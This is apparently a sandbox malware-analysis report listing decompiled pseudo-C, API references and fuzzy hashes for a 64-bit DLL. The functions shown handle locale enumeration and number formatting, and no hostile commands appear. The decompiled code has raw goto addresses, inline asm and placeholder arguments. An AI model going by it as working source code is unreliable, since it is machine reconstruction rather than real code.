                                                                      0x18004c23a
                                                                      0x18004c23d
                                                                      0x18004c244
                                                                      0x18004c24c
                                                                      0x18004c24e
                                                                      0x18004c258
                                                                      0x18004c25a
                                                                      0x18004c25d
                                                                      0x18004c25f
                                                                      0x18004c262
                                                                      0x18004c272
                                                                      0x18004c27a
                                                                      0x18004c280
                                                                      0x18004c284
                                                                      0x18004c289
                                                                      0x18004c28d
                                                                      0x18004c292
                                                                      0x18004c294
                                                                      0x18004c2a0

                                                                      APIs
                                                                        • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                        • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                        • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,000000018004CA0B,?,00000000,00000092,?,?,00000000,?,000000018003E281), ref: 000000018004C272
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: 6f7a749c0bafec3919f4f57150461d942c59bbc6645eefc0ab58f5d5bdfbbe37
                                                                      • Instruction ID: 3ffbbbfe0ec5c9fdacb820aaf3d0191787d56117823266e480ab26608625024b
                                                                      • Opcode Fuzzy Hash: 6f7a749c0bafec3919f4f57150461d942c59bbc6645eefc0ab58f5d5bdfbbe37
                                                                      • Instruction Fuzzy Hash: 87112473A04A488AEB968F65D180BE97BA0F398FE8F45C115E625433D0CEB4C7D5C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 19%
                                                                      			E0000000118004C7DC(signed int __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, intOrPtr _a8, long long _a16, long long _a24) {
                                                                      				int _t13;
                                                                      				signed int _t17;
                                                                      				void* _t26;
                                                                      				void* _t35;
                                                                      				void* _t43;
                                                                      				signed short* _t51;
                                                                      
                                                                      				_t43 = __rdx;
                                                                      				_t35 = __rax;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_t26 = __edx;
                                                                      				_t17 = __ecx;
                                                                      				E0000000118003CFF0(__rax, __rbx, __rdx, __rsi);
                                                                      				r9d = 2;
                                                                      				asm("bts ecx, 0xa");
                                                                      				_t13 = GetLocaleInfoW(??, ??, ??, ??);
                                                                      				r10d = 0;
                                                                      				if (_t13 == 0) goto 0x8004c875;
                                                                      				if (_t17 == _a8) goto 0x8004c86e;
                                                                      				if (_t26 == 0) goto 0x8004c86e;
                                                                      				_t51 =  *((intOrPtr*)(_t35 + 0x98));
                                                                      				r8d = r10d;
                                                                      				if (_t43 - 0x41 - 0x19 <= 0) goto 0x8004c84f;
                                                                      				if (( *_t51 & 0x0000ffff) - 0x61 - 0x19 > 0) goto 0x8004c85b;
                                                                      				r8d = r8d + 1;
                                                                      				goto 0x8004c83c;
                                                                      				if (_t51[( &(_t51[2]) | 0xffffffff) + 1] != r10w) goto 0x8004c85f;
                                                                      				if (r8d == (_t17 & 0x000003ff)) goto 0x8004c875;
                                                                      				goto 0x8004c877;
                                                                      				return 0;
                                                                      			}









                                                                      0x18004c7dc
                                                                      0x18004c7dc
                                                                      0x18004c7dc
                                                                      0x18004c7e1
                                                                      0x18004c7eb
                                                                      0x18004c7ed
                                                                      0x18004c7ef
                                                                      0x18004c801
                                                                      0x18004c807
                                                                      0x18004c813
                                                                      0x18004c819
                                                                      0x18004c81e
                                                                      0x18004c824
                                                                      0x18004c828
                                                                      0x18004c82a
                                                                      0x18004c831
                                                                      0x18004c843
                                                                      0x18004c84d
                                                                      0x18004c852
                                                                      0x18004c859
                                                                      0x18004c867
                                                                      0x18004c86c
                                                                      0x18004c873
                                                                      0x18004c886

                                                                      APIs
                                                                        • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                        • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                        • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,000000018004C561), ref: 000000018004C813
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$InfoLocaleValue
                                                                      • String ID:
                                                                      • API String ID: 3796814847-0
                                                                      • Opcode ID: aaf272d80b428d5133a0afd77a39b0733f84ada8d575ff1964f0562cdada597b
                                                                      • Instruction ID: e572e4013508a40ae2dc72019e1c330ac91dfc9983ebde1ccd39182403175954
                                                                      • Opcode Fuzzy Hash: aaf272d80b428d5133a0afd77a39b0733f84ada8d575ff1964f0562cdada597b
                                                                      • Instruction Fuzzy Hash: 9D114032714998C2E7F65B12D080BEE2261E748BE8F11822DFB35076C5DE35CA898345
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0000000118004C2A4(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
                                                                      				int _t17;
                                                                      				void* _t25;
                                                                      				void* _t29;
                                                                      				signed char* _t31;
                                                                      				signed short* _t36;
                                                                      				void* _t38;
                                                                      				signed long long _t44;
                                                                      				void* _t45;
                                                                      
                                                                      				_t29 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t31 = __rcx;
                                                                      				E0000000118003CFF0(__rax, __rcx, __rdx, _t38);
                                                                      				_t45 = _t29;
                                                                      				_t36 =  *((intOrPtr*)(_t29 + 0x98));
                                                                      				_t44 = (__r8 | 0xffffffff) + 1;
                                                                      				if (_t36[_t44] != 0) goto 0x8004c2c6;
                                                                      				_t25 = _t44 - 3;
                                                                      				 *(_t45 + 0xb0) = 0 | _t25 == 0x00000000;
                                                                      				if (_t25 == 0) goto 0x8004c30f;
                                                                      				r9d = 0;
                                                                      				r8d =  *_t36 & 0x0000ffff;
                                                                      				if (_t44 - 0x41 - 0x19 <= 0) goto 0x8004c307;
                                                                      				r8w = r8w - 0x61;
                                                                      				if (r8w - 0x19 > 0) goto 0x8004c30c;
                                                                      				r9d = r9d + 1;
                                                                      				goto 0x8004c2ea;
                                                                      				 *((intOrPtr*)(_t45 + 0xac)) = r9d;
                                                                      				_t17 = EnumSystemLocalesW(??, ??);
                                                                      				if (( *_t31 & 0x00000004) != 0) goto 0x8004c32f;
                                                                      				 *_t31 = 0;
                                                                      				return _t17;
                                                                      			}











                                                                      0x18004c2a4
                                                                      0x18004c2a4
                                                                      0x18004c2ae
                                                                      0x18004c2b1
                                                                      0x18004c2ba
                                                                      0x18004c2bf
                                                                      0x18004c2c6
                                                                      0x18004c2ce
                                                                      0x18004c2d2
                                                                      0x18004c2de
                                                                      0x18004c2e5
                                                                      0x18004c2e7
                                                                      0x18004c2ea
                                                                      0x18004c2f9
                                                                      0x18004c2fb
                                                                      0x18004c305
                                                                      0x18004c307
                                                                      0x18004c30a
                                                                      0x18004c30f
                                                                      0x18004c322
                                                                      0x18004c32b
                                                                      0x18004c32d
                                                                      0x18004c339

                                                                      APIs
                                                                        • Part of subcall function 000000018003CFF0: GetLastError.KERNEL32 ref: 000000018003CFFF
                                                                        • Part of subcall function 000000018003CFF0: FlsGetValue.KERNEL32 ref: 000000018003D014
                                                                        • Part of subcall function 000000018003CFF0: SetLastError.KERNEL32 ref: 000000018003D09F
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,000000018004C9C7,?,00000000,00000092,?,?,00000000,?,000000018003E281), ref: 000000018004C322
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: 61a4eac4eb6ff6ac6f3a7ac2fe31d7d9020df02ec08711e42431d02f326703d5
                                                                      • Instruction ID: 0cb8ec6749fa517b6198a46ce7d38a9fc7c04a4603ddfa2623d77a224cd3ee05
                                                                      • Opcode Fuzzy Hash: 61a4eac4eb6ff6ac6f3a7ac2fe31d7d9020df02ec08711e42431d02f326703d5
                                                                      • Instruction Fuzzy Hash: 3D01287270068886EBD25F56E480BDD7691E348BE9F46C222F220472C8DF748688C706
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001800474BB,?,?,?,?,?,?,?,?,00000000,000000018004B6F4), ref: 00000001800466B3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: ba1def702d92e8a95ffcbe92af6e8cf28018d5c85ff05b17eaa361da225a80cc
                                                                      • Instruction ID: ba87133ad5258a55a08c06e6b0d9f9c469f1cf7f542c36b29db8a57471a7f423
                                                                      • Opcode Fuzzy Hash: ba1def702d92e8a95ffcbe92af6e8cf28018d5c85ff05b17eaa361da225a80cc
                                                                      • Instruction Fuzzy Hash: B3F03C72300A4882E785DB25E8903D963A2F79C7D4F55C125FA4D83366DF3DC699C344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0000000118004C150(void* __edx, void* __rax, long long __rbx, signed char* __rcx, signed long long __rdx, long long _a8) {
                                                                      				int _t15;
                                                                      				void* _t22;
                                                                      				signed char* _t25;
                                                                      				signed long long _t29;
                                                                      				signed long long _t31;
                                                                      				void* _t32;
                                                                      
                                                                      				_t29 = __rdx;
                                                                      				_t22 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_t25 = __rcx;
                                                                      				E0000000118003CFF0(__rax, __rcx, __rdx, _t32);
                                                                      				_t31 = (_t29 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t22 + 0xa0)) + _t31 * 2)) != 0) goto 0x8004c172;
                                                                      				 *(_t22 + 0xb4) = 0 | _t31 == 0x00000003;
                                                                      				_t15 = EnumSystemLocalesW(??, ??);
                                                                      				if (( *_t25 & 0x00000004) != 0) goto 0x8004c1a4;
                                                                      				 *_t25 = 0;
                                                                      				return _t15;
                                                                      			}









                                                                      0x18004c150
                                                                      0x18004c150
                                                                      0x18004c150
                                                                      0x18004c15a
                                                                      0x18004c15d
                                                                      0x18004c172
                                                                      0x18004c179
                                                                      0x18004c190
                                                                      0x18004c197
                                                                      0x18004c1a0
                                                                      0x18004c1a2
                                                                      0x18004c1ae

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$EnumLocalesSystemValue
                                                                      • String ID:
                                                                      • API String ID: 3029459697-0
                                                                      • Opcode ID: b8ee0502ff824193323125283b8464ff63aa9831de222f9573b8ca6e83823bf9
                                                                      • Instruction ID: 31820b48630101ea642ae716095b38231b07873db3cd3973771d5387480055a0
                                                                      • Opcode Fuzzy Hash: b8ee0502ff824193323125283b8464ff63aa9831de222f9573b8ca6e83823bf9
                                                                      • Instruction Fuzzy Hash: BAF0897270078881EB925F25E540799BBE1D795BF4F19C311E674436E5CE74C694C301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: f7aed0fdf31a97c1444b6123fb62bc774cef6810465702e4fb5ccbf4192d993c
                                                                      • Instruction ID: 93019bb43afba3089c78001942fb653200be660fe0497971c153cfd4178c72f3
                                                                      • Opcode Fuzzy Hash: f7aed0fdf31a97c1444b6123fb62bc774cef6810465702e4fb5ccbf4192d993c
                                                                      • Instruction Fuzzy Hash: 98E01AB5710A0881EB85DB15EC9139533A2B35DBE0F90D116E90D87725DE3EC29D8340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: EnumLocalesSystem
                                                                      • String ID:
                                                                      • API String ID: 2099609381-0
                                                                      • Opcode ID: cfa96960963232b9b504c79c6856cfa8b6addbd21d96258ee9666e8cf9cb6dcf
                                                                      • Instruction ID: d9d78c61b36ce8ee1df59b2cd1ce9247de0cb83687b60b09247d975857a00761
                                                                      • Opcode Fuzzy Hash: cfa96960963232b9b504c79c6856cfa8b6addbd21d96258ee9666e8cf9cb6dcf
                                                                      • Instruction Fuzzy Hash: 39E08C70610A0981E3859B51FC603E523A2B3ED7E4F908216F80D57321DE3E839D8340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E0000000118003FA6C(void* __rax, long long __rbx, unsigned int* __rcx, signed long long __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long __r11, long long _a8, long long _a16, long long _a24, char* _a40, signed int _a48, signed int _a56, intOrPtr _a64, intOrPtr _a72, long long _a80) {
                                                                      				void* _v40;
                                                                      				long long _v48;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v64;
                                                                      				signed int _v72;
                                                                      				unsigned int* _v80;
                                                                      				long long _v88;
                                                                      				void* __rdi;
                                                                      				intOrPtr _t83;
                                                                      				void* _t84;
                                                                      				void* _t86;
                                                                      				signed int _t88;
                                                                      				unsigned int* _t121;
                                                                      				signed int _t122;
                                                                      				void* _t140;
                                                                      				char* _t159;
                                                                      				unsigned long long _t171;
                                                                      				char* _t185;
                                                                      				char* _t186;
                                                                      				intOrPtr _t187;
                                                                      				unsigned int* _t190;
                                                                      				char* _t193;
                                                                      				intOrPtr* _t198;
                                                                      				intOrPtr* _t199;
                                                                      				void* _t200;
                                                                      				void* _t203;
                                                                      				void* _t204;
                                                                      				signed long long _t207;
                                                                      				signed long long _t212;
                                                                      				signed long long _t215;
                                                                      				void* _t218;
                                                                      				char* _t220;
                                                                      				void* _t221;
                                                                      				signed int* _t223;
                                                                      				signed int* _t232;
                                                                      				signed int* _t233;
                                                                      				signed int* _t234;
                                                                      				signed int* _t240;
                                                                      				long long _t244;
                                                                      				void* _t246;
                                                                      				intOrPtr* _t247;
                                                                      				unsigned int* _t248;
                                                                      
                                                                      				_t244 = __r11;
                                                                      				_t230 = __r8;
                                                                      				_t225 = __rbp;
                                                                      				_t219 = __rsi;
                                                                      				_t207 = __rdx;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				r11d = 0;
                                                                      				 *__rdx = r11b;
                                                                      				_t121 =  >=  ? _a48 : r11d;
                                                                      				_t185 = __rdx;
                                                                      				_t248 = __rcx;
                                                                      				_t5 = _t218 + 0xb; // 0xb
                                                                      				if (__r8 - _t5 > 0) goto 0x8003fae4;
                                                                      				_t190 = _a80;
                                                                      				_t7 = _t244 + 0x22; // 0x22
                                                                      				_v80 = _t190;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v88 = __r11;
                                                                      				_t190[0xc] = 1;
                                                                      				_t190[0xb] = _t7;
                                                                      				E00000001180013858(__rax, __rdx, _t190, __rdx, __rsi, __rbp, __r8);
                                                                      				goto 0x8003fe02;
                                                                      				if (( *_t190 >> 0x00000034 & _t207) != _t207) goto 0x8003fb83;
                                                                      				_v48 = _a80;
                                                                      				_v56 = _a72;
                                                                      				_v64 = _a64;
                                                                      				_t159 = _a40;
                                                                      				_v72 = r11b;
                                                                      				_v80 = _t121;
                                                                      				_v88 = _t159;
                                                                      				if (E0000000118003FE20(_t185, _t248, _t185, _t218, _t219, _t230, __r9) == 0) goto 0x8003fb52;
                                                                      				 *_t185 = 0;
                                                                      				goto 0x8003fe02;
                                                                      				_t193 = _t185;
                                                                      				E0000000118005B81C(_t76, 0x65, _t159, _t193);
                                                                      				if (_t159 == 0) goto 0x8003fe00;
                                                                      				 *_t159 = ((_a56 ^ 0x00000001) << 5) + 0x50;
                                                                      				 *((char*)(_t159 + 3)) = 0;
                                                                      				goto 0x8003fe00;
                                                                      				if (_t193 >= 0) goto 0x8003fb95;
                                                                      				 *_t185 = 0x2d;
                                                                      				_t186 = _t185 + 1;
                                                                      				_t247 = _t186 + 1;
                                                                      				r12d = 0x3ff;
                                                                      				r15d = (_a56 ^ 0x00000001) & 0x000000ff;
                                                                      				r8d = 0x30;
                                                                      				_a48 = r15d;
                                                                      				if ((0x00000000 &  *_t248) != 0) goto 0x8003fbf4;
                                                                      				 *_t186 = r8b;
                                                                      				asm("dec ebp");
                                                                      				r12d = r12d & 0x000003fe;
                                                                      				goto 0x8003fbf7;
                                                                      				 *_t186 = 0x31;
                                                                      				_t220 = _t247 + 1;
                                                                      				if (_t121 != 0) goto 0x8003fc04;
                                                                      				goto 0x8003fc3b;
                                                                      				_t187 = _a80;
                                                                      				if ( *((intOrPtr*)(_t187 + 0x28)) != r11b) goto 0x8003fc2b;
                                                                      				E000000011800338E0( ~( *_t248 & 0xffffffff), _t187, _t187, _t185, _t220);
                                                                      				r11d = 0;
                                                                      				_t32 = _t244 + 0x30; // 0x30
                                                                      				r8d = _t32;
                                                                      				_t83 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t187 + 0x18)) + 0xf8))))));
                                                                      				 *_t247 = _t83;
                                                                      				if (( *_t248 & 0xffffffff) <= 0) goto 0x8003fcdf;
                                                                      				if (_t121 <= 0) goto 0x8003fc89;
                                                                      				_t84 = _t83 + r8w;
                                                                      				_t140 = _t84 - 0x39;
                                                                      				if (_t140 <= 0) goto 0x8003fc76;
                                                                      				 *_t220 = _t84 + (r15d << 5) + 7;
                                                                      				_t122 = _t121 - 1;
                                                                      				_t221 = _t220 + 1;
                                                                      				if (_t140 >= 0) goto 0x8003fc56;
                                                                      				goto 0x8003fcd7;
                                                                      				r9d = _a72;
                                                                      				r8d = r8w & 0xffff;
                                                                      				_t86 = E0000000118004055C(_t84 + (r15d << 5) + 7, _t7, _t187, _t248, 0 >> 4, _t218, _t221, _t225);
                                                                      				r11d = 0;
                                                                      				if (_t86 == 0) goto 0x8003fcd7;
                                                                      				_t198 = _t221 - 1;
                                                                      				if (0x47 != 0) goto 0x8003fcbc;
                                                                      				 *_t198 = 0x30;
                                                                      				_t199 = _t198 - 1;
                                                                      				goto 0x8003fcab;
                                                                      				if (_t199 == _t247) goto 0x8003fcd4;
                                                                      				if ( *_t198 != 0x39) goto 0x8003fccc;
                                                                      				bpl = bpl + 0x3a;
                                                                      				goto 0x8003fccf;
                                                                      				 *_t199 = bpl;
                                                                      				goto 0x8003fcd7;
                                                                      				 *((char*)(_t199 - 1)) =  *((char*)(_t199 - 1)) + 1;
                                                                      				r15d = _a48;
                                                                      				if (_t122 <= 0) goto 0x8003fd00;
                                                                      				r8d = _t122;
                                                                      				_t200 = _t221;
                                                                      				_t88 = E000000011800046A0(0xbadb67, dil, _t200, 0 >> 4, _t230);
                                                                      				r11d = 0;
                                                                      				goto 0x8003fd05;
                                                                      				_t223 =  ==  ? _t247 : _t221 + _t187;
                                                                      				r15b = r15b << 5;
                                                                      				r15b = r15b + 0x50;
                                                                      				 *_t223 = r15b;
                                                                      				_t240 =  &(_t223[0]);
                                                                      				_t171 =  *_t248 >> 0x34;
                                                                      				if ( *_t247 - r11b >= 0) goto 0x8003fd38;
                                                                      				_t203 = _t246 - _t171;
                                                                      				_t47 = _t171 + 2; // 0x2d
                                                                      				_t91 =  <  ? _t47 : 0x2b;
                                                                      				_t223[0] =  <  ? _t47 : 0x2b;
                                                                      				 *_t240 = dil;
                                                                      				if (_t203 - 0x3e8 < 0) goto 0x8003fd8c;
                                                                      				_t232 =  &(_t240[0]);
                                                                      				_t212 = (_t200 - _t246 >> 7) + (_t200 - _t246 >> 7 >> 0x3f);
                                                                      				 *_t240 = _t218 + _t212;
                                                                      				_t204 = _t203 + _t212 * 0xfffffc18;
                                                                      				if (_t232 != _t240) goto 0x8003fd92;
                                                                      				if (_t204 - 0x64 < 0) goto 0x8003fdc5;
                                                                      				_t215 = (_t212 + _t204 >> 6) + (_t212 + _t204 >> 6 >> 0x3f);
                                                                      				 *_t232 = _t218 + _t215;
                                                                      				_t233 =  &(_t232[0]);
                                                                      				if (_t233 != _t240) goto 0x8003fdcb;
                                                                      				if (_t204 + _t215 * 0xffffff9c - 0xa < 0) goto 0x8003fdf6;
                                                                      				 *_t233 = _t218 + (_t215 >> 2) + (_t215 >> 2 >> 0x3f);
                                                                      				_t234 =  &(_t233[0]);
                                                                      				 *_t234 = (_t88 & 0x000007ff) + dil;
                                                                      				_t234[0] = r11b;
                                                                      				return 0;
                                                                      			}













































                                                                      0x18003fa6c
                                                                      0x18003fa6c
                                                                      0x18003fa6c
                                                                      0x18003fa6c
                                                                      0x18003fa6c
                                                                      0x18003fa6c
                                                                      0x18003fa71
                                                                      0x18003fa76
                                                                      0x18003fa8f
                                                                      0x18003fa94
                                                                      0x18003fa9d
                                                                      0x18003faa0
                                                                      0x18003faa3
                                                                      0x18003faa6
                                                                      0x18003faaf
                                                                      0x18003fab1
                                                                      0x18003fab9
                                                                      0x18003fabd
                                                                      0x18003fac2
                                                                      0x18003fac5
                                                                      0x18003fac8
                                                                      0x18003facf
                                                                      0x18003fad3
                                                                      0x18003fad8
                                                                      0x18003fadf
                                                                      0x18003faf9
                                                                      0x18003fb0a
                                                                      0x18003fb1c
                                                                      0x18003fb27
                                                                      0x18003fb2b
                                                                      0x18003fb33
                                                                      0x18003fb38
                                                                      0x18003fb3c
                                                                      0x18003fb48
                                                                      0x18003fb4a
                                                                      0x18003fb4d
                                                                      0x18003fb57
                                                                      0x18003fb5a
                                                                      0x18003fb62
                                                                      0x18003fb78
                                                                      0x18003fb7a
                                                                      0x18003fb7e
                                                                      0x18003fb8b
                                                                      0x18003fb8d
                                                                      0x18003fb8f
                                                                      0x18003fb9c
                                                                      0x18003fba2
                                                                      0x18003fba8
                                                                      0x18003fbac
                                                                      0x18003fbb5
                                                                      0x18003fbda
                                                                      0x18003fbdc
                                                                      0x18003fbe8
                                                                      0x18003fbeb
                                                                      0x18003fbf2
                                                                      0x18003fbf4
                                                                      0x18003fbf7
                                                                      0x18003fbfd
                                                                      0x18003fc02
                                                                      0x18003fc04
                                                                      0x18003fc10
                                                                      0x18003fc15
                                                                      0x18003fc1a
                                                                      0x18003fc27
                                                                      0x18003fc27
                                                                      0x18003fc39
                                                                      0x18003fc3b
                                                                      0x18003fc42
                                                                      0x18003fc5b
                                                                      0x18003fc69
                                                                      0x18003fc6d
                                                                      0x18003fc71
                                                                      0x18003fc76
                                                                      0x18003fc78
                                                                      0x18003fc7a
                                                                      0x18003fc85
                                                                      0x18003fc87
                                                                      0x18003fc89
                                                                      0x18003fc91
                                                                      0x18003fc9b
                                                                      0x18003fca0
                                                                      0x18003fca5
                                                                      0x18003fca7
                                                                      0x18003fcb2
                                                                      0x18003fcb4
                                                                      0x18003fcb7
                                                                      0x18003fcba
                                                                      0x18003fcbf
                                                                      0x18003fcc4
                                                                      0x18003fcc6
                                                                      0x18003fcca
                                                                      0x18003fccf
                                                                      0x18003fcd2
                                                                      0x18003fcd4
                                                                      0x18003fcd7
                                                                      0x18003fce1
                                                                      0x18003fce3
                                                                      0x18003fce6
                                                                      0x18003fcf3
                                                                      0x18003fcfb
                                                                      0x18003fcfe
                                                                      0x18003fd09
                                                                      0x18003fd0d
                                                                      0x18003fd11
                                                                      0x18003fd15
                                                                      0x18003fd18
                                                                      0x18003fd1f
                                                                      0x18003fd30
                                                                      0x18003fd35
                                                                      0x18003fd43
                                                                      0x18003fd46
                                                                      0x18003fd49
                                                                      0x18003fd4c
                                                                      0x18003fd56
                                                                      0x18003fd62
                                                                      0x18003fd74
                                                                      0x18003fd7a
                                                                      0x18003fd84
                                                                      0x18003fd8a
                                                                      0x18003fd90
                                                                      0x18003fdad
                                                                      0x18003fdb3
                                                                      0x18003fdb6
                                                                      0x18003fdc3
                                                                      0x18003fdc9
                                                                      0x18003fde9
                                                                      0x18003fdec
                                                                      0x18003fdf9
                                                                      0x18003fdfc
                                                                      0x18003fe1f

                                                                      Strings
